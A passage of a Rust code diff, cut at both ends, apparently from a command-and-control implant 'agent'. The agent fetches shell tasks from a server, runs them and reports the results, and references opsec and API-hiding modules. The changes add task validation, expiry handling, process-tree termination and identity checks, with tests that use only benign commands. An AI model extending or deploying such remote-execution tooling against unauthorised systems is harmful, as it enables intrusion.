+        for index in 0..(MAX_TERMINAL_TASK_IDS + 5) {
+            outbox.set_terminal(&format!("task-{index}"), TaskDeliveryState::Delivered);
+        }
+
+        assert!(outbox.lock_states().len() <= MAX_TERMINAL_TASK_IDS);
+        assert!(outbox.state("task-0").is_none());
+        assert!(matches!(
+            outbox.state(&format!("task-{}", MAX_TERMINAL_TASK_IDS + 4)),
+            Some(TaskDeliveryState::Delivered)
+        ));
+    }
+
+    #[tokio::test]
+    async fn task_at_expiry_boundary_is_blocked_without_acknowledgement_or_execution() {
+        let outbox = TaskOutbox::default();
+        let mut task = sample_task("echo hello");
+        task.expires_at = Some("2026-07-23T16:30:02Z".to_string());
+        assert!(outbox.enqueue_at(task.clone(), "2026-07-23T16:30:01.234Z".to_string()));
+        let transport = MockTransport::new([], []);
+        let executor = CountingExecutor::successful("must not run");
+
+        outbox
+            .process_all_with_clock(&transport, &executor, fixed_now)
+            .await;
+
+        assert_eq!(executor.executions(), 0);
+        assert!(transport.running_attempts().is_empty());
+        assert!(transport.result_attempts().is_empty());
+        assert!(matches!(
+            outbox.state(&task.id),
+            Some(TaskDeliveryState::Blocked { .. })
+        ));
     }
 
     #[test]
@@ -732,5 +1990,123 @@ mod tests {
         assert_eq!(payload["payload_id"], "payload-one");
         assert_eq!(payload["listener_id"], "listener-one");
         assert_ne!(payload["id"], payload["payload_id"]);
+    }
+
+    fn sample_task(command: &str) -> Task {
+        Task {
+            schema_version: TASK_SCHEMA_VERSION,
+            id: "task-one".to_string(),
+            agent_id: "agent-one".to_string(),
+            task_type: crate::tasks::TaskType::Shell,
+            arguments: crate::tasks::TaskArguments {
+                command: command.to_string(),
+            },
+            timeout_seconds: 30,
+            status: crate::tasks::TaskStatus::Dispatched,
+            created_at: "2026-07-23T16:30:00Z".to_string(),
+            queued_at: "2026-07-23T16:30:00Z".to_string(),
+            dispatched_at: Some("2026-07-23T16:30:01Z".to_string()),
+            started_at: None,
+            completed_at: None,
+            expires_at: Some("2026-07-23T16:35:00Z".to_string()),
+            result: None,
+        }
+    }
+
+    fn fixed_now() -> DateTime<Utc> {
+        DateTime::parse_from_rfc3339("2026-07-23T16:30:02Z")
+            .expect("fixed RFC3339 timestamp")
+            .with_timezone(&Utc)
+    }
+
+    struct MockTransport {
+        running_outcomes: Mutex<VecDeque<SubmissionOutcome>>,
+        result_outcomes: Mutex<VecDeque<SubmissionOutcome>>,
+        running_attempts: Mutex<Vec<(String, String)>>,
+        result_attempts: Mutex<Vec<TaskResult>>,
+    }
+
+    impl MockTransport {
+        fn new(
+            running_outcomes: impl IntoIterator<Item = SubmissionOutcome>,
+            result_outcomes: impl IntoIterator<Item = SubmissionOutcome>,
+        ) -> Self {
+            Self {
+                running_outcomes: Mutex::new(running_outcomes.into_iter().collect()),
+                result_outcomes: Mutex::new(result_outcomes.into_iter().collect()),
+                running_attempts: Mutex::new(Vec::new()),
+                result_attempts: Mutex::new(Vec::new()),
+            }
+        }
+
+        fn running_attempts(&self) -> Vec<(String, String)> {
+            self.running_attempts
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .clone()
+        }
+
+        fn result_attempts(&self) -> Vec<TaskResult> {
+            self.result_attempts
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .clone()
+        }
+    }
+
+    impl TaskTransport for MockTransport {
+        async fn submit_running(&self, task: &Task, started_at: &str) -> SubmissionOutcome {
+            self.running_attempts
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .push((task.id.clone(), started_at.to_string()));
+            self.running_outcomes
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .pop_front()
+                .unwrap_or(SubmissionOutcome::Accepted)
+        }
+
+        async fn submit_result(&self, result: &TaskResult) -> SubmissionOutcome {
+            self.result_attempts
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .push(result.clone());
+            self.result_outcomes
+                .lock()
+                .unwrap_or_else(std::sync::PoisonError::into_inner)
+                .pop_front()
+                .unwrap_or(SubmissionOutcome::Accepted)
+        }
+    }
+
+    struct CountingExecutor {
+        count: AtomicUsize,
+        execution: ShellExecution,
+    }
+
+    impl CountingExecutor {
+        fn successful(stdout: &str) -> Self {
+            Self {
+                count: AtomicUsize::new(0),
+                execution: ShellExecution {
+                    stdout: stdout.to_string(),
+                    stderr: String::new(),
+                    exit_code: Some(0),
+                    error: None,
+                },
+            }
+        }
+
+        fn executions(&self) -> usize {
+            self.count.load(Ordering::SeqCst)
+        }
+    }
+
+    impl TaskExecutor for CountingExecutor {
+        async fn execute(&self, _task: &Task) -> ShellExecution {
+            self.count.fetch_add(1, Ordering::SeqCst);
+            self.execution.clone()
+        }
     }
 }

--- a/agent/src/commands/command_shell.rs
+++ b/agent/src/commands/command_shell.rs
@@ -20,7 +20,6 @@ use serde_json::{json, Value};
 use std::collections::{HashMap, VecDeque};
 use std::env;
 use std::io::{self, Read};
-use std::path::Path;
 use std::process::{Command, ExitStatus, Stdio};
 use std::sync::mpsc as std_mpsc;
 use std::sync::Arc;
@@ -168,18 +167,10 @@ async fn execute_shell(command: &str, timeout_seconds: u64) -> ShellExecution {
 
     if cmd_parts[0] == "cd" {
         let result = if cmd_parts.len() > 1 {
-            let path = Path::new(cmd_parts[1]);
-            if path.exists() {
-                env::set_current_dir(path).and_then(|_| {
-                    env::current_dir()
-                        .map(|current| format!("Changed directory to {}", current.display()))
-                })
-            } else {
-                Err(io::Error::new(
-                    io::ErrorKind::NotFound,
-                    "Directory not found",
-                ))
-            }
+            env::set_current_dir(cmd_parts[1]).and_then(|_| {
+                env::current_dir()
+                    .map(|current| format!("Changed directory to {}", current.display()))
+            })
         } else {
             env::current_dir().map(|current| format!("Current directory: {}", current.display()))
         };
@@ -473,8 +464,32 @@ impl ProcessTreeGuard {
     }
 
     #[cfg(unix)]
+    fn process_group_id(&self) -> io::Result<libc::pid_t> {
+        let pid = libc::pid_t::try_from(self.pid)
+            .map_err(|_| io::Error::other("child PID does not fit in pid_t"))?;
+        pid.checked_neg()
+            .ok_or_else(|| io::Error::other("child PID cannot identify a process group"))
+    }
+
+    #[cfg(unix)]
     fn terminate(&self, child: &mut std::process::Child) -> Option<String> {
-        let result = unsafe { libc::kill(-(self.pid as i32), libc::SIGKILL) };
+        let process_group = match self.process_group_id() {
+            Ok(process_group) => process_group,
+            Err(group_error) => {
+                return match child.kill() {
+                    Ok(()) => Some(format!(
+                        "failed to identify command process group: {group_error}; terminated direct child"
+                    )),
+                    Err(child_error) => Some(format!(
+                        "failed to identify command process group: {group_error}; direct termination also failed: {child_error}"
+                    )),
+                };
+            }
+        };
+        // SAFETY: process_group is a checked negative child PID. kill(2)
+        // accepts this integer selector and does not dereference memory.
+        // foxguard: ignore[rs/unsafe-block]
+        let result = unsafe { libc::kill(process_group, libc::SIGKILL) };
         if result == 0 {
             return None;
         }
@@ -496,7 +511,14 @@ impl ProcessTreeGuard {
 
     #[cfg(unix)]
     fn cleanup_descendants(&self) -> Option<String> {
-        let result = unsafe { libc::kill(-(self.pid as i32), libc::SIGKILL) };
+        let process_group = match self.process_group_id() {
+            Ok(process_group) => process_group,
+            Err(error) => return Some(error.to_string()),
+        };
+        // SAFETY: process_group is a checked negative child PID. kill(2)
+        // accepts this integer selector and does not dereference memory.
+        // foxguard: ignore[rs/unsafe-block]
+        let result = unsafe { libc::kill(process_group, libc::SIGKILL) };
         if result == 0 {
             return None;
         }
@@ -566,12 +588,21 @@ impl WindowsJob {
             JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE,
         };
 
+        // SAFETY: null security-attribute and name pointers request Windows
+        // defaults. The returned handle is checked before use and owned here.
+        // foxguard: ignore[rs/unsafe-block]
         let handle: HANDLE = unsafe { CreateJobObjectW(ptr::null_mut(), ptr::null()) };
         if handle.is_null() {
             return Err(io::Error::last_os_error());
         }
+        // SAFETY: this Win32 information structure is plain data and Windows
+        // requires every field to start at zero before selected flags are set.
+        // foxguard: ignore[rs/unsafe-block]
         let mut limits: JOBOBJECT_EXTENDED_LIMIT_INFORMATION = unsafe { mem::zeroed() };
         limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE;
+        // SAFETY: handle is non-null and owned, limits is initialized, and the
+        // pointer and byte count describe exactly one limits structure.
+        // foxguard: ignore[rs/unsafe-block]
         let configured = unsafe {
             SetInformationJobObject(
                 handle,
@@ -582,17 +613,27 @@ impl WindowsJob {
         };
         if configured == FALSE {
             let error = io::Error::last_os_error();
+            // SAFETY: handle is the non-null owned handle created above and is
+            // closed exactly once on this error path.
+            // foxguard: ignore[rs/unsafe-block]
             unsafe {
                 winapi::um::handleapi::CloseHandle(handle);
             }
             return Err(error);
         }
+        // SAFETY: handle remains valid and child.as_raw_handle() is borrowed
+        // only for the duration of this synchronous Win32 call.
+        // foxguard: ignore[rs/unsafe-block]
         let assigned = unsafe { AssignProcessToJobObject(handle, child.as_raw_handle() as HANDLE) };
         if assigned == FALSE {
+            let error = io::Error::last_os_error();
+            // SAFETY: handle is the non-null owned handle created above and is
+            // closed exactly once on this error path.
+            // foxguard: ignore[rs/unsafe-block]
             unsafe {
                 winapi::um::handleapi::CloseHandle(handle);
             }
-            return Err(io::Error::last_os_error());
+            return Err(error);
         }
         Ok(Self { handle })
     }
@@ -601,6 +642,9 @@ impl WindowsJob {
         use winapi::shared::minwindef::FALSE;
         use winapi::um::jobapi2::TerminateJobObject;
 
+        // SAFETY: self.handle is a live job handle owned by self for the
+        // duration of this call.
+        // foxguard: ignore[rs/unsafe-block]
         if unsafe { TerminateJobObject(self.handle, 1) } == FALSE {
             return Err(io::Error::last_os_error());
         }
@@ -611,6 +655,8 @@ impl WindowsJob {
 #[cfg(windows)]
 impl Drop for WindowsJob {
     fn drop(&mut self) {
+        // SAFETY: self owns the non-null job handle and Drop runs once.
+        // foxguard: ignore[rs/unsafe-block]
         unsafe {
             winapi::um::handleapi::CloseHandle(self.handle);
         }

--- a/agent/src/file_handling/download.rs
+++ b/agent/src/file_handling/download.rs
@@ -20,6 +20,7 @@ pub async fn download_file(url: &str, dest_path: &Path) -> Result<(), Box<dyn Er
     while let Some(chunk) = resp.chunk().await? {
         file.write_all(&chunk).await?;
     }
+    file.flush().await?;
 
     Ok(())
 }

--- a/agent/src/identity.rs
+++ b/agent/src/identity.rs
@@ -1,19 +1,20 @@
 use crate::config::AgentConfig;
+use crate::tasks::{validate_identifier, TaskValidationError};
 use std::env;
 use std::fs;
 use std::path::{Path, PathBuf};
 
 const AGENT_ID_FILE: &str = "agent_id";
 
-pub fn resolve_runtime_agent_id(config: &AgentConfig) -> String {
-    if let Some(agent_id) = configured_agent_id(&config.agent_id) {
-        return agent_id;
+pub fn resolve_runtime_agent_id(config: &AgentConfig) -> Result<String, TaskValidationError> {
+    if let Some(agent_id) = configured_agent_id(&config.agent_id)? {
+        return Ok(agent_id);
     }
 
-    match runtime_identity_dir() {
+    Ok(match runtime_identity_dir() {
         Some(config_dir) => load_or_create_runtime_agent_id(&config_dir, &config.payload_id),
         None => generate_runtime_agent_id(&config.payload_id),
-    }
+    })
 }
 
 pub fn generate_runtime_agent_id(payload_id: &str) -> String {
@@ -25,13 +26,12 @@ pub fn generate_runtime_agent_id(payload_id: &str) -> String {
     )
 }
 
-fn configured_agent_id(agent_id: &str) -> Option<String> {
-    let trimmed = agent_id.trim();
-    if trimmed.is_empty() {
-        None
-    } else {
-        Some(trimmed.to_string())
+fn configured_agent_id(agent_id: &str) -> Result<Option<String>, TaskValidationError> {
+    if agent_id.is_empty() {
+        return Ok(None);
     }
+    validate_identifier("agent_id", agent_id)?;
+    Ok(Some(agent_id.to_string()))
 }
 
 fn runtime_identity_dir() -> Option<PathBuf> {
@@ -56,7 +56,7 @@ fn load_or_create_runtime_agent_id(config_dir: &Path, payload_id: &str) -> Strin
 
 fn read_runtime_agent_id(id_path: &Path) -> Option<String> {
     match fs::read_to_string(id_path) {
-        Ok(content) => configured_agent_id(&content),
+        Ok(content) => configured_agent_id(&content).ok().flatten(),
         Err(_) => None,
     }
 }
@@ -95,11 +95,37 @@ mod tests {
     fn explicit_agent_id_wins() {
         let config = AgentConfig {
             payload_id: "payload-one".to_string(),
+            agent_id: "configured-agent".to_string(),
+            ..Default::default()
+        };
+
+        assert_eq!(
+            resolve_runtime_agent_id(&config).expect("valid configured identity"),
+            "configured-agent"
+        );
+    }
+
+    #[test]
+    fn invalid_explicit_agent_id_fails_fast() {
+        let config = AgentConfig {
+            payload_id: "payload-one".to_string(),
+            agent_id: "invalid agent/id".to_string(),
+            ..Default::default()
+        };
+
+        let error = resolve_runtime_agent_id(&config).expect_err("invalid configured identity");
+        assert!(error.to_string().contains("unsupported characters"));
+    }
+
+    #[test]
+    fn explicit_agent_id_is_not_silently_trimmed() {
+        let config = AgentConfig {
+            payload_id: "payload-one".to_string(),
             agent_id: " configured-agent ".to_string(),
             ..Default::default()
         };
 
-        assert_eq!(resolve_runtime_agent_id(&config), "configured-agent");
+        assert!(resolve_runtime_agent_id(&config).is_err());
     }
 
     #[test]
@@ -113,6 +139,25 @@ mod tests {
 
         let id_path = config_dir.join(AGENT_ID_FILE);
         assert!(id_path.exists());
+        let _ = fs::remove_file(id_path);
+        let _ = fs::remove_dir_all(config_dir);
+    }
+
+    #[test]
+    fn invalid_persisted_agent_id_is_replaced() {
+        let config_dir = unique_temp_dir("invalid-identity");
+        fs::create_dir_all(&config_dir).expect("create identity dir");
+        let id_path = config_dir.join(AGENT_ID_FILE);
+        fs::write(&id_path, "invalid agent/id").expect("write invalid identity");
+
+        let resolved = load_or_create_runtime_agent_id(&config_dir, "payload-one");
+        assert_ne!(resolved, "invalid agent/id");
+        validate_identifier("agent_id", &resolved).expect("replacement identifier");
+        assert_eq!(
+            fs::read_to_string(&id_path).expect("read replacement identity"),
+            resolved
+        );
+
         let _ = fs::remove_file(id_path);
         let _ = fs::remove_dir_all(config_dir);
     }

--- a/agent/src/lib.rs
+++ b/agent/src/lib.rs
@@ -7,6 +7,7 @@ pub mod identity;
 pub mod networking;
 pub mod opsec;
 pub mod state;
+pub mod tasks;
 pub mod util;
 #[cfg(target_os = "windows")]
 pub mod win_api_hiding;

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -107,7 +107,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
         .nth(1)
         .unwrap_or_else(|| config.get_server_url());
 
-    let agent_id = agent::identity::resolve_runtime_agent_id(&config);
+    let agent_id = agent::identity::resolve_runtime_agent_id(&config)?;
     info!("[INFO] Payload ID: {}", config.payload_id);
     info!("[INFO] Agent ID: {}", agent_id);
 

--- a/agent/src/tasks.rs
+++ b/agent/src/tasks.rs
@@ -1,0 +1,650 @@
+use chrono::DateTime;
+use serde::{Deserialize, Serialize};
+use std::error::Error;
+use std::fmt;
+
+pub const TASK_SCHEMA_VERSION: u32 = 1;
+pub const MAX_TASK_TIMEOUT_SECONDS: u64 = 3_600;
+pub const MAX_SHELL_COMMAND_CHARS: usize = 8_192;
+pub const MAX_TASK_OUTPUT_CHARS: usize = 1_048_576;
+pub const MAX_TASK_ERROR_CHARS: usize = 8_192;
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(rename_all = "lowercase")]
+pub enum TaskType {
+    Shell,
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(rename_all = "lowercase")]
+pub enum TaskStatus {
+    Queued,
+    Dispatched,
+    Running,
+    Completed,
+    Failed,
+    Cancelled,
+    Expired,
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct TaskArguments {
+    pub command: String,
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct Task {
+    pub schema_version: u32,
+    pub id: String,
+    pub agent_id: String,
+    #[serde(rename = "type")]
+    pub task_type: TaskType,
+    pub arguments: TaskArguments,
+    pub timeout_seconds: u64,
+    pub status: TaskStatus,
+    pub created_at: String,
+    pub queued_at: String,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub dispatched_at: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub started_at: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub completed_at: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub expires_at: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub result: Option<TaskResult>,
+}
+
+impl Task {
+    pub fn validate_for_agent(&self, expected_agent_id: &str) -> Result<(), TaskValidationError> {
+        if self.schema_version != TASK_SCHEMA_VERSION {
+            return Err(TaskValidationError::new(format!(
+                "unsupported task schema version {}; expected {}",
+                self.schema_version, TASK_SCHEMA_VERSION
+            )));
+        }
+        validate_identifier("id", &self.id)?;
+        validate_identifier("agent_id", &self.agent_id)?;
+        validate_identifier("runtime agent_id", expected_agent_id)?;
+        if self.agent_id != expected_agent_id {
+            return Err(TaskValidationError::new(format!(
+                "task agent_id {:?} does not match runtime agent {:?}",
+                self.agent_id, expected_agent_id
+            )));
+        }
+        if self.status != TaskStatus::Dispatched {
+            return Err(TaskValidationError::new(format!(
+                "polled task must have dispatched status, got {:?}",
+                self.status
+            )));
+        }
+        if self.result.is_some() {
+            return Err(TaskValidationError::new(
+                "dispatched task must not already contain a result",
+            ));
+        }
+        if self.dispatched_at.is_none() {
+            return Err(TaskValidationError::new(
+                "dispatched task must include dispatched_at",
+            ));
+        }
+        if self.started_at.is_some() {
+            return Err(TaskValidationError::new(
+                "dispatched task must not include started_at",
+            ));
+        }
+        if self.completed_at.is_some() {
+            return Err(TaskValidationError::new(
+                "dispatched task must not include completed_at",
+            ));
+        }
+        if self.expires_at.is_none() {
+            return Err(TaskValidationError::new(
+                "dispatched task must include expires_at",
+            ));
+        }
+        if self.arguments.command.trim().is_empty() {
+            return Err(TaskValidationError::new(
+                "shell task arguments.command is required",
+            ));
+        }
+        if self.arguments.command.chars().count() > MAX_SHELL_COMMAND_CHARS {
+            return Err(TaskValidationError::new(format!(
+                "shell task arguments.command must be at most {} characters",
+                MAX_SHELL_COMMAND_CHARS
+            )));
+        }
+        if !(1..=MAX_TASK_TIMEOUT_SECONDS).contains(&self.timeout_seconds) {
+            return Err(TaskValidationError::new(format!(
+                "timeout_seconds must be between 1 and {}",
+                MAX_TASK_TIMEOUT_SECONDS
+            )));
+        }
+
+        validate_timestamp("created_at", &self.created_at)?;
+        validate_timestamp("queued_at", &self.queued_at)?;
+        validate_optional_timestamp("dispatched_at", self.dispatched_at.as_deref())?;
+        validate_optional_timestamp("started_at", self.started_at.as_deref())?;
+        validate_optional_timestamp("completed_at", self.completed_at.as_deref())?;
+        validate_optional_timestamp("expires_at", self.expires_at.as_deref())?;
+
+        Ok(())
+    }
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(rename_all = "lowercase")]
+pub enum TaskOutcome {
+    Completed,
+    Failed,
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct TaskOutput {
+    pub stdout: String,
+    pub stderr: String,
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct TaskResult {
+    pub schema_version: u32,
+    pub task_id: String,
+    pub agent_id: String,
+    pub outcome: TaskOutcome,
+    pub started_at: String,
+    pub completed_at: String,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub exit_code: Option<i32>,
+    pub output: TaskOutput,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub error: Option<String>,
+}
+
+impl TaskResult {
+    pub fn validate(&self) -> Result<(), TaskValidationError> {
+        if self.schema_version != TASK_SCHEMA_VERSION {
+            return Err(TaskValidationError::new(format!(
+                "unsupported result schema version {}; expected {}",
+                self.schema_version, TASK_SCHEMA_VERSION
+            )));
+        }
+        validate_identifier("task_id", &self.task_id)?;
+        validate_identifier("agent_id", &self.agent_id)?;
+        validate_timestamp("started_at", &self.started_at)?;
+        validate_timestamp("completed_at", &self.completed_at)?;
+        let started_at = DateTime::parse_from_rfc3339(&self.started_at)
+            .map_err(|_| TaskValidationError::new("started_at must be an RFC3339 timestamp"))?;
+        let completed_at = DateTime::parse_from_rfc3339(&self.completed_at)
+            .map_err(|_| TaskValidationError::new("completed_at must be an RFC3339 timestamp"))?;
+        if completed_at < started_at {
+            return Err(TaskValidationError::new(
+                "completed_at must not precede started_at",
+            ));
+        }
+        if self.output.stdout.chars().count() > MAX_TASK_OUTPUT_CHARS {
+            return Err(TaskValidationError::new(format!(
+                "output.stdout must be at most {} characters",
+                MAX_TASK_OUTPUT_CHARS
+            )));
+        }
+        if self.output.stderr.chars().count() > MAX_TASK_OUTPUT_CHARS {
+            return Err(TaskValidationError::new(format!(
+                "output.stderr must be at most {} characters",
+                MAX_TASK_OUTPUT_CHARS
+            )));
+        }
+        if self
+            .error
+            .as_deref()
+            .is_some_and(|error| error.chars().count() > MAX_TASK_ERROR_CHARS)
+        {
+            return Err(TaskValidationError::new(format!(
+                "error must be at most {} characters",
+                MAX_TASK_ERROR_CHARS
+            )));
+        }
+        match &self.outcome {
+            TaskOutcome::Completed => {
+                if self.exit_code != Some(0) {
+                    return Err(TaskValidationError::new(
+                        "completed result must include exit_code 0",
+                    ));
+                }
+                if self.error.is_some() {
+                    return Err(TaskValidationError::new(
+                        "completed result must not include error",
+                    ));
+                }
+            }
+            TaskOutcome::Failed => {
+                if !self
+                    .error
+                    .as_deref()
+                    .is_some_and(|error| !error.trim().is_empty())
+                {
+                    return Err(TaskValidationError::new(
+                        "failed result must include a nonblank error",
+                    ));
+                }
+            }
+        }
+        Ok(())
+    }
+}
+
+#[derive(Clone, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct TaskStatusUpdate {
+    pub schema_version: u32,
+    pub task_id: String,
+    pub agent_id: String,
+    pub status: TaskStatus,
+    pub timestamp: String,
+}
+
+impl TaskStatusUpdate {
+    pub fn running(task: &Task, timestamp: String) -> Self {
+        Self {
+            schema_version: TASK_SCHEMA_VERSION,
+            task_id: task.id.clone(),
+            agent_id: task.agent_id.clone(),
+            status: TaskStatus::Running,
+            timestamp,
+        }
+    }
+
+    pub fn validate(&self) -> Result<(), TaskValidationError> {
+        if self.schema_version != TASK_SCHEMA_VERSION {
+            return Err(TaskValidationError::new(format!(
+                "unsupported status schema version {}; expected {}",
+                self.schema_version, TASK_SCHEMA_VERSION
+            )));
+        }
+        validate_identifier("task_id", &self.task_id)?;
+        validate_identifier("agent_id", &self.agent_id)?;
+        if self.status != TaskStatus::Running {
+            return Err(TaskValidationError::new(
+                "agent status updates may only transition a task to running",
+            ));
+        }
+        validate_timestamp("timestamp", &self.timestamp)
+    }
+}
+
+#[derive(Clone, Debug, Eq, PartialEq)]
+pub struct TaskValidationError {
+    message: String,
+}
+
+impl TaskValidationError {
+    fn new(message: impl Into<String>) -> Self {
+        Self {
+            message: message.into(),
+        }
+    }
+}
+
+impl fmt::Display for TaskValidationError {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        f.write_str(&self.message)
+    }
+}
+
+impl Error for TaskValidationError {}
+
+fn validate_timestamp(field: &str, value: &str) -> Result<(), TaskValidationError> {
+    let parsed = DateTime::parse_from_rfc3339(value)
+        .map_err(|_| TaskValidationError::new(format!("{field} must be an RFC3339 timestamp")))?;
+    let zero = DateTime::parse_from_rfc3339("0001-01-01T00:00:00Z")
+        .map_err(|_| TaskValidationError::new("internal zero timestamp is invalid"))?;
+    if parsed == zero {
+        return Err(TaskValidationError::new(format!(
+            "{field} must not be the zero instant"
+        )));
+    }
+    Ok(())
+}
+
+pub fn validate_identifier(field: &str, value: &str) -> Result<(), TaskValidationError> {
+    if value.is_empty() {
+        return Err(TaskValidationError::new(format!("{field} is required")));
+    }
+    if value.len() > 128 {
+        return Err(TaskValidationError::new(format!(
+            "{field} must be at most 128 bytes"
+        )));
+    }
+    if !value
+        .bytes()
+        .all(|byte| byte.is_ascii_alphanumeric() || matches!(byte, b'-' | b'_' | b'.' | b':'))
+    {
+        return Err(TaskValidationError::new(format!(
+            "{field} contains unsupported characters"
+        )));
+    }
+    Ok(())
+}
+
+fn validate_optional_timestamp(
+    field: &str,
+    value: Option<&str>,
+) -> Result<(), TaskValidationError> {
+    if let Some(value) = value {
+        validate_timestamp(field, value)?;
+    }
+    Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    const GOLDEN_TASK: &str = include_str!(concat!(
+        env!("CARGO_MANIFEST_DIR"),
+        "/../docs/schemas/examples/task-v1.json"
+    ));
+    const GOLDEN_RESULT: &str = include_str!(concat!(
+        env!("CARGO_MANIFEST_DIR"),
+        "/../docs/schemas/examples/task-result-v1.json"
+    ));
+    const GOLDEN_DISPATCHED_TASK: &str = include_str!(concat!(
+        env!("CARGO_MANIFEST_DIR"),
+        "/../docs/schemas/examples/task-dispatched-v1.json"
+    ));
+    const GOLDEN_FAILED_RESULT: &str = include_str!(concat!(
+        env!("CARGO_MANIFEST_DIR"),
+        "/../docs/schemas/examples/task-result-failed-v1.json"
+    ));
+    const GOLDEN_STATUS_UPDATE: &str = include_str!(concat!(
+        env!("CARGO_MANIFEST_DIR"),
+        "/../docs/schemas/examples/task-status-update-v1.json"
+    ));
+
+    fn sample_task() -> Task {
+        Task {
+            schema_version: TASK_SCHEMA_VERSION,
+            id: "task-one".to_string(),
+            agent_id: "agent-one".to_string(),
+            task_type: TaskType::Shell,
+            arguments: TaskArguments {
+                command: "echo hello".to_string(),
+            },
+            timeout_seconds: 30,
+            status: TaskStatus::Dispatched,
+            created_at: "2026-07-23T16:00:00Z".to_string(),
+            queued_at: "2026-07-23T16:00:01Z".to_string(),
+            dispatched_at: Some("2026-07-23T16:00:02Z".to_string()),
+            started_at: None,
+            completed_at: None,
+            expires_at: Some("2026-07-23T16:00:32Z".to_string()),
+            result: None,
+        }
+    }
+
+    #[test]
+    fn task_v1_round_trips_with_normative_wire_names() {
+        let task = sample_task();
+        let encoded = serde_json::to_value(&task).expect("serialize task");
+
+        assert_eq!(encoded["schema_version"], 1);
+        assert_eq!(encoded["type"], "shell");
+        assert_eq!(encoded["status"], "dispatched");
+        assert_eq!(encoded["arguments"]["command"], "echo hello");
+        assert!(encoded.get("started_at").is_none());
+
+        let decoded: Task = serde_json::from_value(encoded).expect("deserialize task");
+        assert_eq!(decoded, task);
+        decoded.validate_for_agent("agent-one").expect("valid task");
+    }
+
+    #[test]
+    fn shared_golden_examples_deserialize_and_round_trip() {
+        let task: Task = serde_json::from_str(GOLDEN_TASK).expect("deserialize golden task");
+        assert_eq!(
+            serde_json::to_value(&task).expect("serialize golden task"),
+            serde_json::from_str::<serde_json::Value>(GOLDEN_TASK).expect("parse task JSON")
+        );
+
+        let result: TaskResult =
+            serde_json::from_str(GOLDEN_RESULT).expect("deserialize golden result");
+        result.validate().expect("validate golden result");
+        assert_eq!(
+            serde_json::to_value(&result).expect("serialize golden result"),
+            serde_json::from_str::<serde_json::Value>(GOLDEN_RESULT).expect("parse result JSON")
+        );
+
+        let update: TaskStatusUpdate =
+            serde_json::from_str(GOLDEN_STATUS_UPDATE).expect("deserialize golden status update");
+        update.validate().expect("validate golden status update");
+        assert_eq!(
+            serde_json::to_value(&update).expect("serialize golden status update"),
+            serde_json::from_str::<serde_json::Value>(GOLDEN_STATUS_UPDATE)
+                .expect("parse status update JSON")
+        );
+
+        let dispatched: Task =
+            serde_json::from_str(GOLDEN_DISPATCHED_TASK).expect("deserialize dispatched task");
+        dispatched
+            .validate_for_agent("agent-01")
+            .expect("validate dispatched task");
+
+        let failed: TaskResult =
+            serde_json::from_str(GOLDEN_FAILED_RESULT).expect("deserialize failed result");
+        failed.validate().expect("validate failed result");
+    }
+
+    #[test]
+    fn task_parser_rejects_unsupported_types() {
+        let mut encoded = serde_json::to_value(sample_task()).expect("serialize task");
+        encoded["type"] = json!("pivot");
+
+        let err = serde_json::from_value::<Task>(encoded).expect_err("unsupported task type");
+        assert!(err.to_string().contains("unknown variant"));
+    }
+
+    #[test]
+    fn task_validation_rejects_wrong_agent_empty_command_and_timeout_bounds() {
+        let task = sample_task();
+        assert!(task.validate_for_agent("agent-two").is_err());
+
+        let mut empty_command = task.clone();
+        empty_command.arguments.command = "  ".to_string();
+        assert!(empty_command.validate_for_agent("agent-one").is_err());
+
+        let mut zero_timeout = task.clone();
+        zero_timeout.timeout_seconds = 0;
+        assert!(zero_timeout.validate_for_agent("agent-one").is_err());
+
+        let mut queued = task.clone();
+        queued.status = TaskStatus::Queued;
+        assert!(queued.validate_for_agent("agent-one").is_err());
+
+        let mut missing_dispatch = task.clone();
+        missing_dispatch.dispatched_at = None;
+        assert!(missing_dispatch.validate_for_agent("agent-one").is_err());
+
+        let mut already_started = task.clone();
+        already_started.started_at = Some("2026-07-23T16:00:03Z".to_string());
+        assert!(already_started.validate_for_agent("agent-one").is_err());
+
+        let mut already_completed = task.clone();
+        already_completed.completed_at = Some("2026-07-23T16:00:04Z".to_string());
+        assert!(already_completed.validate_for_agent("agent-one").is_err());
+
+        let mut missing_expiry = task.clone();
+        missing_expiry.expires_at = None;
+        assert!(missing_expiry.validate_for_agent("agent-one").is_err());
+
+        let mut invalid_id = task.clone();
+        invalid_id.id = "task/one".to_string();
+        assert!(invalid_id.validate_for_agent("agent-one").is_err());
+
+        let mut excessive_timeout = task;
